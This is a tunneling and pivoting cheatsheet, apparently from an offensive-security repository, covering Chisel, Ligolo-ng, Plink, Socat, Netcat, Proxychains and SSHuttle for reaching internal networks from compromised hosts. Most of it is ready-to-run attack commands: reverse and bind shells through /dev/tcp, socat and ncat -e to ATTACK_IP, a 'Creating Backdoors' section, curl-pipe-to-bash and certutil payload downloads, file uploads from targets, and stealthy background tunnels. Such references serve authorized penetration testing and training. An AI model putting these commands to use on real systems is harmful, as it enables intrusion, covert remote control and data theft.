daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

tunneling.md (36183B)


      1 ---
      2 title: "Tunneling"
      3 description: "tunneling-tools/ ├── chisel/ # TCP/UDP tunnel over HTTP (Fast SOCKS proxy) ├── ligolo-ng/ # Advanced TUN-based tunneling (VPN-like, no SOCKS needed!) ├──…"
      4 category: tunneling-pivoting
      5 tags: ["tunneling-pivoting", "relay", "pivoting", "tunneling"]
      6 tools: ["Nmap", "Impacket", "Metasploit", "Chisel", "Ligolo-ng"]
      7 difficulty: intermediate
      8 updated: "2026-08-10"
      9 source: "vault:Misc/Tunneling.md"
     10 ---
     11 # Tunneling Tools Cheatsheet
     12 
     13 ## Quick Reference Table
     14 
     15 | Tool | Best For | Requires Root | Stealthy | Multi-Platform |
     16 |------|----------|---------------|----------|----------------|
     17 | **Ligolo-ng** | Full network pivoting | Only on attacker | High | ✅ |
     18 | **Chisel** | Quick SOCKS proxy | No | Medium | ✅ |
     19 | **SSHuttle** | VPN-like tunneling | Yes (attacker) | High | Linux/Mac |
     20 | **Plink** | Windows SSH tunneling | No | High | Windows only |
     21 | **Socat** | Port forwarding/relays | No | High | Linux/Windows |
     22 | **Netcat** | Simple port forwarding | No | Medium | ✅ |
     23 | **Proxychains** | Route tools via proxy | No | N/A | Linux/Mac |
     24 
     25 ## Installed Tools Location
     26 ```
     27 tunneling-tools/
     28 ├── chisel/          # TCP/UDP tunnel over HTTP (Fast SOCKS proxy)
     29 ├── ligolo-ng/       # Advanced TUN-based tunneling (VPN-like, no SOCKS needed!)
     30 ├── plink/           # SSH client for Windows (PuTTY Link)
     31 ├── socat/           # Multipurpose relay (Port forwarding, shell upgrades)
     32 ├── nc/              # Netcat (ncat) - Classic networking swiss army knife
     33 ├── proxychains/     # Route tools through SOCKS/HTTP proxies (Install via brew)
     34 └── sshuttle/        # VPN over SSH (Install via brew)
     35 ```
     36 
     37 ---
     38 
     39 ## CHISEL
     40 **Best for:** Quick SOCKS proxy setup, HTTP-based tunneling (bypasses restrictive firewalls)
     41 
     42 ### Start Server (Attack Box)
     43 ```bash
     44 # macOS (Apple Silicon)
     45 ./chisel/macos/chisel_darwin_arm64 server -p 8080 --reverse
     46 
     47 # macOS (Intel)
     48 ./chisel/macos/chisel_darwin_amd64 server -p 8080 --reverse
     49 
     50 # Linux
     51 ./chisel/linux/chisel_linux_amd64 server -p 8080 --reverse
     52 
     53 # With authentication (recommended)
     54 ./chisel server -p 8080 --reverse --auth user:password
     55 
     56 # Verbose mode (see connections)
     57 ./chisel server -p 8080 --reverse -v
     58 ```
     59 
     60 ### Connect Client (Target)
     61 ```bash
     62 # Linux - Reverse SOCKS proxy
     63 ./chisel_linux_amd64 client ATTACK_IP:8080 R:1080:socks
     64 
     65 # Windows - Reverse SOCKS proxy
     66 chisel_windows_amd64.exe client ATTACK_IP:8080 R:1080:socks
     67 
     68 # With authentication
     69 ./chisel client --auth user:password ATTACK_IP:8080 R:1080:socks
     70 
     71 # Multiple port forwards
     72 ./chisel client ATTACK_IP:8080 R:1080:socks R:8888:localhost:80 R:3389:10.10.10.5:3389
     73 ```
     74 
     75 ### Common Chisel Patterns
     76 ```bash
     77 # Reverse SOCKS (most common - access target's network from attacker)
     78 chisel client ATTACK_IP:8080 R:1080:socks
     79 
     80 # Forward specific port (expose target's service on attacker)
     81 chisel client ATTACK_IP:8080 R:8888:127.0.0.1:80
     82 
     83 # Local SOCKS (less common - access attacker's network from target)
     84 chisel client ATTACK_IP:8080 1080:socks
     85 
     86 # Remote forward with specific bind address
     87 chisel client ATTACK_IP:8080 R:0.0.0.0:9999:localhost:80
     88 ```
     89 
     90 ### Usage with Proxychains
     91 ```bash
     92 # After establishing SOCKS proxy on port 1080
     93 proxychains4 nmap -sT -Pn 10.10.10.0/24
     94 proxychains4 curl http://internal-server
     95 proxychains4 firefox  # Browse internal web apps
     96 ```
     97 
     98 ---
     99 
    100 ## LIGOLO-NG
    101 **Best for:** Full network pivoting without SOCKS, TUN-based (works like a VPN), automatic routing
    102 
    103 ### Setup TUN Interface (Attack Box - One Time Setup)
    104 
    105 #### Linux
    106 ```bash
    107 sudo ip tuntap add user $(whoami) mode tun ligolo
    108 sudo ip link set ligolo up
    109 ```
    110 
    111 #### macOS
    112 ```bash
    113 # Install tuntaposx if needed
    114 brew install --cask tuntap
    115 
    116 # Create interface (done automatically by ligolo-ng on macOS)
    117 ```
    118 
    119 #### Windows
    120 ```powershell
    121 # Ligolo-ng handles TUN interface automatically on Windows
    122 # Run as Administrator
    123 ```
    124 
    125 ### Start Proxy (Attack Box)
    126 ```bash
    127 # Linux
    128 ./ligolo-ng/linux/proxy -selfcert -laddr 0.0.0.0:11601
    129 
    130 # macOS
    131 ./ligolo-ng/macos/proxy -selfcert -laddr 0.0.0.0:11601
    132 
    133 # With custom certificate
    134 ./proxy -certfile server.crt -keyfile server.key -laddr 0.0.0.0:11601
    135 
    136 # Enable autoroute (automatically adds routes - v0.8+)
    137 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute
    138 
    139 # With Web UI (multiplayer mode - v0.8+)
    140 ./proxy -selfcert -laddr 0.0.0.0:11601 -api 127.0.0.1:8080
    141 ```
    142 
    143 ### Connect Agent (Target)
    144 ```bash
    145 # Linux
    146 ./agent -connect ATTACK_IP:11601 -ignore-cert
    147 
    148 # Windows
    149 agent.exe -connect ATTACK_IP:11601 -ignore-cert
    150 
    151 # With specific network interface
    152 ./agent -connect ATTACK_IP:11601 -ignore-cert -bind 192.168.1.10
    153 
    154 # Retry connection on failure
    155 ./agent -connect ATTACK_IP:11601 -ignore-cert -retry
    156 ```
    157 
    158 ### Ligolo Console Commands
    159 ```
    160 # Session management
    161 session                                      # List all connected sessions
    162 session <id>                                 # Select a session
    163 info                                         # Show session info
    164 
    165 # Network discovery
    166 ifconfig                                     # Show target's network interfaces
    167 listener_list                                # Show active listeners
    168 
    169 # Tunneling
    170 start                                        # Start the tunnel
    171 stop                                         # Stop the tunnel
    172 
    173 # Port forwarding (reverse - opens port on target)
    174 listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
    175 listener_add --addr 10.10.10.5:80 --to 192.168.1.100:8080
    176 listener_stop <id>                           # Stop a listener
    177 
    178 # Remote agent control
    179 agent_kill                                   # Remotely terminate the agent
    180 ```
    181 
    182 ### Add Routes (Attack Box)
    183 
    184 #### Linux
    185 ```bash
    186 # Add route for internal network
    187 sudo ip route add 10.10.10.0/24 dev ligolo
    188 
    189 # Add multiple routes
    190 sudo ip route add 172.16.0.0/16 dev ligolo
    191 sudo ip route add 192.168.50.0/24 dev ligolo
    192 
    193 # View routes
    194 ip route | grep ligolo
    195 ```
    196 
    197 #### macOS
    198 ```bash
    199 # Add route
    200 sudo route add -net 10.10.10.0/24 -interface utun
    201 # Note: utun interface number may vary (utun5, utun6, etc.)
    202 # Check with: ifconfig | grep utun
    203 
    204 # Delete route
    205 sudo route delete 10.10.10.0/24
    206 ```
    207 
    208 #### Windows
    209 ```powershell
    210 # Add route
    211 route add 10.10.10.0 mask 255.255.255.0 10.0.0.1
    212 
    213 # View routes
    214 route print
    215 ```
    216 
    217 ### Complete Workflow Example
    218 ```bash
    219 # 1. Start proxy on attacker
    220 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute
    221 
    222 # 2. Run agent on compromised host
    223 ./agent -connect ATTACKER_IP:11601 -ignore-cert
    224 
    225 # 3. In ligolo console
    226 ligolo-ng » session                    # See connected agent
    227 ligolo-ng » session 1                  # Select the agent
    228 [Agent] ligolo-ng » ifconfig           # View target networks
    229 [Agent] ligolo-ng » start              # Start tunnel
    230 
    231 # 4. Add routes (if not using autoroute)
    232 sudo ip route add 172.16.5.0/24 dev ligolo
    233 
    234 # 5. Access internal network directly
    235 nmap -sT -Pn 172.16.5.0/24             # No proxychains needed!
    236 ssh user@172.16.5.10
    237 curl http://172.16.5.50:8080
    238 ```
    239 
    240 ### Double Pivoting (Pivot through multiple networks)
    241 ```bash
    242 # Network topology: Attacker -> Host1 -> Host2 -> Target Network
    243 
    244 # 1. Setup pivot on Host1
    245 ./agent -connect ATTACKER_IP:11601 -ignore-cert
    246 
    247 # 2. From attacker, add route to Host1's network
    248 sudo ip route add 192.168.100.0/24 dev ligolo
    249 
    250 # 3. Setup listener on Host1 for Host2 to connect back
    251 listener_add --addr 192.168.100.50:11601 --to ATTACKER_IP:11601
    252 
    253 # 4. From Host2, connect through Host1
    254 ./agent -connect 192.168.100.50:11601 -ignore-cert
    255 
    256 # 5. Add route to Host2's network
    257 sudo ip route add 10.20.30.0/24 dev ligolo
    258 ```
    259 
    260 ---
    261 
    262 ## PLINK (Windows SSH Client)
    263 **Best for:** SSH tunneling from Windows targets (no installation needed, single executable)
    264 
    265 ### Prerequisites
    266 ```bash
    267 # On attack box, enable SSH password authentication
    268 sudo vim /etc/ssh/sshd_config
    269 # Set: PasswordAuthentication yes
    270 sudo systemctl restart sshd
    271 
    272 # Create user for tunneling
    273 sudo useradd -m tunneluser
    274 sudo passwd tunneluser
    275 ```
    276 
    277 ### Reverse SSH Tunnel (Expose target service on attacker)
    278 ```cmd
    279 # Expose target's localhost:80 on attacker's port 9999
    280 plink.exe -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password
    281 
    282 # Expose target's RDP to attacker
    283 plink.exe -R 3389:127.0.0.1:3389 user@ATTACK_IP -pw password
    284 
    285 # Expose internal network service
    286 plink.exe -R 8080:10.10.10.50:80 user@ATTACK_IP -pw password
    287 
    288 # Background execution (no window)
    289 plink.exe -ssh -N -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password
    290 ```
    291 
    292 ### Dynamic SOCKS Proxy (Access target's network from attacker)
    293 ```cmd
    294 # Creates SOCKS proxy on attacker's port 1080
    295 plink.exe -D 1080 user@ATTACK_IP -pw password
    296 
    297 # Headless mode
    298 plink.exe -N -D 1080 user@ATTACK_IP -pw password
    299 ```
    300 
    301 ### Local Port Forward (Access attacker's service from target)
    302 ```cmd
    303 # Forward local 8080 to internal service
    304 plink.exe -L 8080:INTERNAL_IP:80 user@ATTACK_IP -pw password
    305 
    306 # Access attacker's tool on target
    307 plink.exe -L 9001:ATTACK_IP:9001 user@ATTACK_IP -pw password
    308 ```
    309 
    310 ### Persistence & Stealth
    311 ```cmd
    312 # Run in background (no console)
    313 start /B plink.exe -N -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password
    314 
    315 # Auto-accept host key (first connection)
    316 echo y | plink.exe -R 9999:127.0.0.1:80 user@ATTACK_IP -pw password
    317 
    318 # Using SSH key instead of password
    319 plink.exe -i private_key.ppk -R 9999:127.0.0.1:80 user@ATTACK_IP
    320 ```
    321 
    322 ---
    323 
    324 ## SOCAT
    325 **Best for:** Port forwarding, shell upgrades, creating relays, encrypted tunnels
    326 
    327 ### Basic Port Forwarding
    328 ```bash
    329 # Forward local 8080 to remote host (TCP)
    330 ./socat_linux_x64 TCP-LISTEN:8080,fork TCP:TARGET_IP:80
    331 
    332 # UDP port forward
    333 ./socat_linux_x64 UDP-LISTEN:53,fork UDP:DNS_SERVER:53
    334 
    335 # Bind to specific interface
    336 ./socat_linux_x64 TCP-LISTEN:8080,bind=192.168.1.10,fork TCP:TARGET_IP:80
    337 
    338 # IPv6 forwarding
    339 socat TCP6-LISTEN:8080,fork TCP6:[fe80::1]:80
    340 ```
    341 
    342 ### Reverse Shell Relay (Pivot through host)
    343 ```bash
    344 # On pivot host - relay connections to attacker
    345 ./socat_linux_x64 TCP-LISTEN:4444,fork TCP:ATTACK_IP:4444
    346 
    347 # Victim connects to pivot
    348 bash -i >& /dev/tcp/PIVOT_IP/4444 0>&1
    349 
    350 # Attacker receives shell
    351 nc -lvnp 4444
    352 ```
    353 
    354 ### TTY Shell Upgrade (Fully Interactive Shell)
    355 ```bash
    356 # Step 1: Attacker - prepare listener
    357 socat file:`tty`,raw,echo=0 TCP-LISTEN:4444
    358 
    359 # Step 2: Target - connect with PTY
    360 ./socat_linux_x64 exec:'bash -li',pty,stderr,setsid,sigint,sane TCP:ATTACK_IP:4444
    361 
    362 # Result: Full TTY with job control, tab completion, clear screen, etc.
    363 ```
    364 
    365 ### Encrypted Tunnels (OpenSSL)
    366 ```bash
    367 # Generate certificate
    368 openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 365 -out bind.crt
    369 cat bind.key bind.crt > bind.pem
    370 
    371 # Listener (encrypted)
    372 socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash
    373 
    374 # Client (connect)
    375 socat - OPENSSL:TARGET_IP:4443,verify=0
    376 ```
    377 
    378 ### File Transfers
    379 ```bash
    380 # Sender
    381 socat TCP-LISTEN:9999,reuseaddr FILE:file.zip
    382 
    383 # Receiver
    384 socat TCP:SENDER_IP:9999 CREATE:received.zip
    385 ```
    386 
    387 ### Port Scanning with Socat
    388 ```bash
    389 # Simple port check
    390 socat - TCP:TARGET:80,connect-timeout=1
    391 
    392 # Banner grabbing
    393 echo "" | socat - TCP:TARGET:22,connect-timeout=1
    394 ```
    395 
    396 ### Creating Reverse Shells
    397 ```bash
    398 # Bind shell (target)
    399 socat TCP-LISTEN:5555,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
    400 
    401 # Reverse shell (target to attacker)
    402 socat EXEC:/bin/bash TCP:ATTACK_IP:4444
    403 
    404 # Windows reverse shell
    405 socat TCP:ATTACK_IP:4444 EXEC:'cmd.exe',pipes
    406 ```
    407 
    408 ---
    409 
    410 ## NETCAT (NCAT)
    411 **Best for:** Quick port forwarding, simple relays, port scanning, basic file transfers
    412 
    413 ### Basic Port Forwarding
    414 ```bash
    415 # Simple TCP relay (pivot)
    416 mkfifo /tmp/f; cat /tmp/f | nc TARGET_IP 80 | nc -l -p 8080 > /tmp/f
    417 
    418 # Persistent relay (using while loop)
    419 while true; do nc -l -p 8080 -c "nc TARGET_IP 80"; done
    420 ```
    421 
    422 ### Reverse Shell Relay
    423 ```bash
    424 # On pivot host - relay to attacker
    425 mkfifo /tmp/f; nc ATTACK_IP 4444 < /tmp/f | nc -l -p 9999 > /tmp/f
    426 
    427 # Victim connects to pivot:9999
    428 # Attacker gets shell on 4444
    429 ```
    430 
    431 ### File Transfers
    432 ```bash
    433 # Receiver (start first)
    434 ./ncat_linux_x64 -l -p 9999 > received_file.zip
    435 
    436 # Sender
    437 ./ncat_linux_x64 TARGET_IP 9999 < file.zip
    438 
    439 # With progress (using pv)
    440 pv file.zip | nc TARGET_IP 9999
    441 ```
    442 
    443 ### Port Scanning
    444 ```bash
    445 # Check single port
    446 nc -zv TARGET_IP 80
    447 
    448 # Scan range
    449 nc -zv TARGET_IP 20-25
    450 
    451 # Banner grabbing
    452 echo "" | nc -v -n -w1 TARGET_IP 22
    453 ```
    454 
    455 ### Creating Backdoors
    456 ```bash
    457 # Bind shell (target)
    458 ./ncat_linux_x64 -l -p 5555 -e /bin/bash
    459 
    460 # Reverse shell (target to attacker)
    461 ./ncat_linux_x64 ATTACK_IP 4444 -e /bin/bash
    462 
    463 # Windows reverse shell
    464 ncat.exe ATTACK_IP 4444 -e cmd.exe
    465 ```
    466 
    467 ### Chat/Communication Channel
    468 ```bash
    469 # Listener
    470 nc -l -p 4444
    471 
    472 # Client
    473 nc TARGET_IP 4444
    474 # Type messages, they appear on both sides
    475 ```
    476 
    477 ---
    478 
    479 ## PROXYCHAINS (Install Required)
    480 **Best for:** Routing any tool through SOCKS/HTTP proxies (pairs well with Chisel/SSH)
    481 
    482 ### Installation
    483 ```bash
    484 # macOS
    485 brew install proxychains-ng
    486 
    487 # Kali Linux / Debian / Ubuntu
    488 sudo apt install proxychains4 -y
    489 
    490 # Arch Linux
    491 sudo pacman -S proxychains-ng
    492 ```
    493 
    494 ### Config File Locations
    495 ```
    496 # macOS (Homebrew)
    497 /opt/homebrew/etc/proxychains.conf      # Apple Silicon
    498 /usr/local/etc/proxychains.conf         # Intel Mac
    499 
    500 # Linux
    501 /etc/proxychains.conf                   # System-wide (older version)
    502 /etc/proxychains4.conf                  # proxychains-ng (newer)
    503 ~/.proxychains/proxychains.conf         # User config (highest priority)
    504 
    505 # Kali Linux
    506 /etc/proxychains4.conf
    507 ```
    508 
    509 ### Configuration Examples
    510 ```bash
    511 # Edit config file
    512 sudo nano /etc/proxychains4.conf
    513 
    514 # Basic SOCKS5 proxy (Chisel default)
    515 [ProxyList]
    516 socks5 127.0.0.1 1080
    517 
    518 # SOCKS4 proxy
    519 socks4 127.0.0.1 1080
    520 
    521 # HTTP proxy
    522 http 127.0.0.1 8080
    523 
    524 # Chain multiple proxies
    525 socks5 127.0.0.1 1080
    526 socks5 10.10.10.5 1081
    527 http 172.16.0.1 3128
    528 
    529 # Proxy with authentication
    530 socks5 127.0.0.1 1080 username password
    531 ```
    532 
    533 ### Proxy Modes (in config file)
    534 ```bash
    535 # Dynamic chain (dead proxies auto-skipped)
    536 dynamic_chain
    537 
    538 # Strict chain (all proxies must work)
    539 strict_chain
    540 
    541 # Random chain (randomize proxy order)
    542 random_chain
    543 # random_chain = 2  # Use 2 random proxies from list
    544 ```
    545 
    546 ### Common Usage
    547 ```bash
    548 # Nmap through proxy (use -sT for TCP connect scan)
    549 proxychains4 nmap -sT -Pn 10.10.10.0/24
    550 
    551 # SSH to internal host
    552 proxychains4 ssh user@internal_host
    553 
    554 # Web requests
    555 proxychains4 curl http://internal-web
    556 proxychains4 wget http://internal-site/file.zip
    557 
    558 # Firefox browser (browse internal web apps)
    559 proxychains4 firefox
    560 
    561 # RDP through proxy
    562 proxychains4 xfreerdp /v:10.10.10.5 /u:admin
    563 
    564 # Metasploit through proxy
    565 proxychains4 msfconsole
    566 ```
    567 
    568 ### Quiet Mode (Suppress Proxychains Output)
    569 ```bash
    570 # Add to config file
    571 quiet_mode
    572 
    573 # Or use -q flag
    574 proxychains4 -q nmap -sT 10.10.10.0/24
    575 ```
    576 
    577 ### Custom Config File
    578 ```bash
    579 # Use specific config
    580 proxychains4 -f /path/to/custom.conf curl http://target
    581 
    582 # Example custom config
    583 cat << EOF > /tmp/proxy.conf
    584 strict_chain
    585 quiet_mode
    586 [ProxyList]
    587 socks5 127.0.0.1 1080
    588 EOF
    589 
    590 proxychains4 -f /tmp/proxy.conf nmap -sT 10.10.10.5
    591 ```
    592 
    593 ### DNS Configuration
    594 ```bash
    595 # In config file:
    596 proxy_dns  # Route DNS through proxy (default, recommended)
    597 
    598 # Or disable:
    599 #proxy_dns  # Local DNS resolution
    600 ```
    601 
    602 ### Troubleshooting
    603 ```bash
    604 # Test proxy connection
    605 proxychains4 curl -I http://google.com
    606 
    607 # Verbose mode (see all proxy operations)
    608 # Comment out quiet_mode in config
    609 
    610 # If "ERROR: ld.so: object 'libproxychains.so.3'" appears:
    611 # Update config with correct lib path or reinstall proxychains
    612 ```
    613 
    614 ---
    615 
    616 ## SSHUTTLE (Install Required)
    617 **Best for:** VPN-like tunneling over SSH (transparent proxying, no SOCKS needed!)
    618 
    619 ### Installation
    620 ```bash
    621 # macOS
    622 brew install sshuttle
    623 
    624 # Kali Linux / Debian / Ubuntu
    625 sudo apt install sshuttle -y
    626 
    627 # Arch Linux
    628 sudo pacman -S sshuttle
    629 
    630 # Python pip
    631 pip3 install sshuttle
    632 ```
    633 
    634 ### Basic Usage
    635 ```bash
    636 # Route all private networks through pivot
    637 sshuttle -r user@PIVOT_HOST 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
    638 
    639 # Route specific subnet
    640 sshuttle -r user@PIVOT_HOST 10.10.10.0/24
    641 
    642 # Multiple subnets
    643 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 192.168.1.0/24
    644 
    645 # Route everything (0/0) - careful!
    646 sshuttle -r user@PIVOT_HOST 0/0
    647 ```
    648 
    649 ### Advanced Options
    650 ```bash
    651 # Exclude specific hosts/networks
    652 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -x PIVOT_HOST -x 10.10.10.50
    653 
    654 # Use SSH key
    655 sshuttle -r user@PIVOT_HOST -e 'ssh -i /path/to/key' 10.10.10.0/24
    656 
    657 # Specify SSH port
    658 sshuttle -r user@PIVOT_HOST:2222 10.10.10.0/24
    659 
    660 # Verbose mode (see connections)
    661 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -vv
    662 
    663 # DNS through tunnel
    664 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 --dns
    665 
    666 # Auto detect and route all remote subnets
    667 sshuttle -r user@PIVOT_HOST --auto-nets
    668 
    669 # Exclude local DNS
    670 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 --dns --to-ns=8.8.8.8
    671 ```
    672 
    673 ### Daemon Mode (Background)
    674 ```bash
    675 # Run in background
    676 sshuttle -r user@PIVOT_HOST 10.10.10.0/24 -D
    677 
    678 # View sshuttle processes
    679 ps aux | grep sshuttle
    680 
    681 # Kill sshuttle
    682 pkill sshuttle
    683 ```
    684 
    685 ### Using Jump Hosts
    686 ```bash
    687 # SSH through jump host
    688 sshuttle -r user@FINAL_HOST -e 'ssh -J user@JUMP_HOST' 10.10.10.0/24
    689 
    690 # Multiple hops
    691 sshuttle -r user@HOST3 -e 'ssh -J user@HOST1,user@HOST2' 10.10.10.0/24
    692 ```
    693 
    694 ### Common Scenarios
    695 ```bash
    696 # Lab/CTF environment
    697 sshuttle -r user@jump.lab.local 10.0.0.0/8 --dns -vv
    698 
    699 # Pentest engagement (exclude your C2 server)
    700 sshuttle -r user@pivot 10.10.0.0/16 -x YOUR_C2_IP
    701 
    702 # Access cloud internal networks
    703 sshuttle -r ubuntu@bastion.aws.com 10.0.0.0/16 172.31.0.0/16
    704 
    705 # Through compromised host with SSH
    706 sshuttle -r root@compromised-host 192.168.100.0/24 --no-latency-control
    707 ```
    708 
    709 ### Troubleshooting
    710 ```bash
    711 # Check firewall rules added by sshuttle
    712 sudo iptables -L -t nat  # Linux
    713 sudo pfctl -s all        # macOS
    714 
    715 # If connection drops
    716 sshuttle -r user@HOST 10.10.10.0/24 --no-latency-control
    717 
    718 # Manually clean up if sshuttle crashes
    719 sudo pkill sshuttle
    720 sudo iptables -t nat -F  # Linux
    721 sudo pfctl -F all        # macOS
    722 
    723 # Test connectivity
    724 ping 10.10.10.5          # After sshuttle is running
    725 curl http://10.10.10.50:80
    726 ```
    727 
    728 ### Comparison with Other Tools
    729 ```
    730 SSHuttle vs Ligolo-ng:
    731 + Simpler (just needs SSH)
    732 + No agent/binary on target
    733 - Requires SSH access
    734 - Slightly slower
    735 
    736 SSHuttle vs Proxychains + Chisel:
    737 + Transparent (no proxychains needed)
    738 + Better performance
    739 + Simpler to use
    740 - Requires SSH
    741 ```
    742 
    743 ---
    744 
    745 ## Quick Transfer Commands
    746 
    747 ### Start HTTP Server (Attacker)
    748 ```bash
    749 # Python3 (default)
    750 python3 -m http.server 8000
    751 
    752 # Python3 on specific interface
    753 python3 -m http.server 8000 --bind 192.168.1.10
    754 
    755 # Python2
    756 python -m SimpleHTTPServer 8000
    757 
    758 # PHP
    759 php -S 0.0.0.0:8000
    760 
    761 # Ruby
    762 ruby -run -e httpd . -p 8000
    763 
    764 # With authentication
    765 python3 -m http.server 8000 --directory /path/to/files
    766 ```
    767 
    768 ### Download on Target
    769 
    770 #### Linux
    771 ```bash
    772 # wget
    773 wget http://ATTACK_IP:8000/chisel_linux_amd64 -O /tmp/chisel && chmod +x /tmp/chisel
    774 
    775 # curl
    776 curl http://ATTACK_IP:8000/chisel_linux_amd64 -o /tmp/chisel && chmod +x /tmp/chisel
    777 
    778 # curl with progress bar
    779 curl -# http://ATTACK_IP:8000/file.zip -o /tmp/file.zip
    780 
    781 # Download and execute in memory (be careful!)
    782 curl http://ATTACK_IP:8000/script.sh | bash
    783 
    784 # Using /dev/tcp if no tools available
    785 cat < /dev/tcp/ATTACK_IP/8000 > /tmp/file
    786 ```
    787 
    788 #### Windows PowerShell
    789 ```powershell
    790 # Invoke-WebRequest (PowerShell 3.0+)
    791 Invoke-WebRequest -Uri http://ATTACK_IP:8000/chisel.exe -OutFile C:\Windows\Temp\chisel.exe
    792 
    793 # Short alias
    794 iwr -uri http://ATTACK_IP:8000/file.zip -o C:\Temp\file.zip
    795 
    796 # WebClient (older PowerShell)
    797 (New-Object System.Net.WebClient).DownloadFile("http://ATTACK_IP:8000/chisel.exe", "C:\Temp\chisel.exe")
    798 
    799 # certutil (sneaky, no PowerShell)
    800 certutil -urlcache -f http://ATTACK_IP:8000/chisel.exe C:\Temp\chisel.exe
    801 
    802 # bitsadmin
    803 bitsadmin /transfer myDownload /download /priority high http://ATTACK_IP:8000/file.exe C:\Temp\file.exe
    804 ```
    805 
    806 #### Windows CMD
    807 ```cmd
    808 # PowerShell one-liner from CMD
    809 powershell -c "Invoke-WebRequest -Uri 'http://ATTACK_IP:8000/file.exe' -OutFile 'C:\Temp\file.exe'"
    810 
    811 # certutil
    812 certutil.exe -urlcache -split -f http://ATTACK_IP:8000/file.exe C:\Temp\file.exe
    813 ```
    814 
    815 ### Upload from Target to Attacker
    816 
    817 #### Using Netcat
    818 ```bash
    819 # Attacker (receiver)
    820 nc -lvnp 9999 > received_file.zip
    821 
    822 # Target (sender)
    823 cat file.zip | nc ATTACK_IP 9999
    824 ```
    825 
    826 #### Using curl (POST)
    827 ```bash
    828 # Attacker (receiver with python)
    829 python3 -m uploadserver 8000
    830 
    831 # Target (sender)
    832 curl -X POST http://ATTACK_IP:8000/upload -F 'files=@/path/to/file.zip'
    833 ```
    834 
    835 ### SMB Transfer (Windows)
    836 
    837 #### Setup SMB Server (Attacker - Linux)
    838 ```bash
    839 # Using impacket
    840 impacket-smbserver share /path/to/share -smb2support
    841 
    842 # With authentication
    843 impacket-smbserver share /path/to/share -smb2support -username user -password pass
    844 ```
    845 
    846 #### Access SMB Share (Target - Windows)
    847 ```cmd
    848 # List share
    849 net view \\ATTACK_IP
    850 
    851 # Copy from share
    852 copy \\ATTACK_IP\share\chisel.exe C:\Temp\
    853 
    854 # Execute from share (no copy)
    855 \\ATTACK_IP\share\chisel.exe
    856 
    857 # Mount share
    858 net use Z: \\ATTACK_IP\share
    859 net use Z: \\ATTACK_IP\share /user:user pass
    860 ```
    861 
    862 ### Base64 Transfer (Small Files)
    863 ```bash
    864 # Encode on attacker
    865 base64 -w0 chisel > chisel.b64
    866 
    867 # Decode on target (Linux)
    868 echo "BASE64_STRING" | base64 -d > chisel && chmod +x chisel
    869 
    870 # Decode on target (Windows PowerShell)
    871 [System.Convert]::FromBase64String("BASE64_STRING") | Set-Content -Path chisel.exe -Encoding Byte
    872 ```
    873 
    874 ---
    875 
    876 ## Common Pentesting Scenarios
    877 
    878 ### Scenario 1: Access Internal Network from Compromised DMZ Host
    879 
    880 **Situation:** You compromised a Linux web server in DMZ (10.50.50.5), need to access internal network (192.168.10.0/24)
    881 
    882 **Solution 1: Ligolo-ng (Best - No SOCKS needed)**
    883 ```bash
    884 # On attacker
    885 ./ligolo-ng/linux/proxy -selfcert -laddr 0.0.0.0:11601 -autoroute
    886 
    887 # On compromised DMZ host
    888 ./agent -connect ATTACKER_IP:11601 -ignore-cert
    889 
    890 # In ligolo console
    891 session 1
    892 start
    893 
    894 # Add route (if autoroute not used)
    895 sudo ip route add 192.168.10.0/24 dev ligolo
    896 
    897 # Access internal network directly
    898 nmap -sT 192.168.10.0/24
    899 ```
    900 
    901 **Solution 2: Chisel + Proxychains (Fast to setup)**
    902 ```bash
    903 # On attacker
    904 ./chisel server -p 8080 --reverse
    905 
    906 # On DMZ host
    907 ./chisel client ATTACKER_IP:8080 R:1080:socks
    908 
    909 # On attacker
    910 proxychains4 nmap -sT 192.168.10.5
    911 ```
    912 
    913 ### Scenario 2: Windows Target with No Direct Outbound Access
    914 
    915 **Situation:** Windows box can only reach another compromised Linux host (pivot), can't reach attacker directly
    916 
    917 **Solution: Double Pivot with Chisel**
    918 ```bash
    919 # Step 1: Setup Chisel on first pivot (Linux)
    920 ./chisel server -p 8080 --reverse
    921 
    922 # Step 2: Windows connects to Linux pivot
    923 chisel.exe client LINUX_PIVOT_IP:8080 R:1080:socks
    924 
    925 # Step 3: On attacker, create another tunnel to reach Windows network via Linux pivot
    926 ssh -L 9999:localhost:1080 user@LINUX_PIVOT_IP
    927 
    928 # Step 4: Configure proxychains to use localhost:9999
    929 # Then access Windows internal network
    930 proxychains4 rdesktop INTERNAL_WINDOWS_IP
    931 ```
    932 
    933 ### Scenario 3: Expose Internal Service to Attacker
    934 
    935 **Situation:** Internal MSSQL server at 172.16.5.10:1433, want to connect from attacker
    936 
    937 **Solution 1: Chisel Reverse Port Forward**
    938 ```bash
    939 # On attacker
    940 ./chisel server -p 8080 --reverse
    941 
    942 # On compromised internal host
    943 ./chisel client ATTACKER_IP:8080 R:1433:172.16.5.10:1433
    944 
    945 # On attacker, connect directly
    946 mssqlclient.py sa:password@127.0.0.1:1433
    947 ```
    948 
    949 **Solution 2: SSH Reverse Tunnel (if SSH available)**
    950 ```bash
    951 # From compromised host
    952 ssh -R 1433:172.16.5.10:1433 user@ATTACKER_IP
    953 
    954 # On attacker
    955 mssqlclient.py sa:password@127.0.0.1:1433
    956 ```
    957 
    958 ### Scenario 4: Port Forward Through Windows (No Custom Tools)
    959 
    960 **Situation:** Compromised Windows server, need tunnel but can't upload tools
    961 
    962 **Solution: Built-in Windows Port Forward (netsh)**
    963 ```cmd
    964 # Forward local port 8080 to internal service
    965 netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=10.10.10.50
    966 
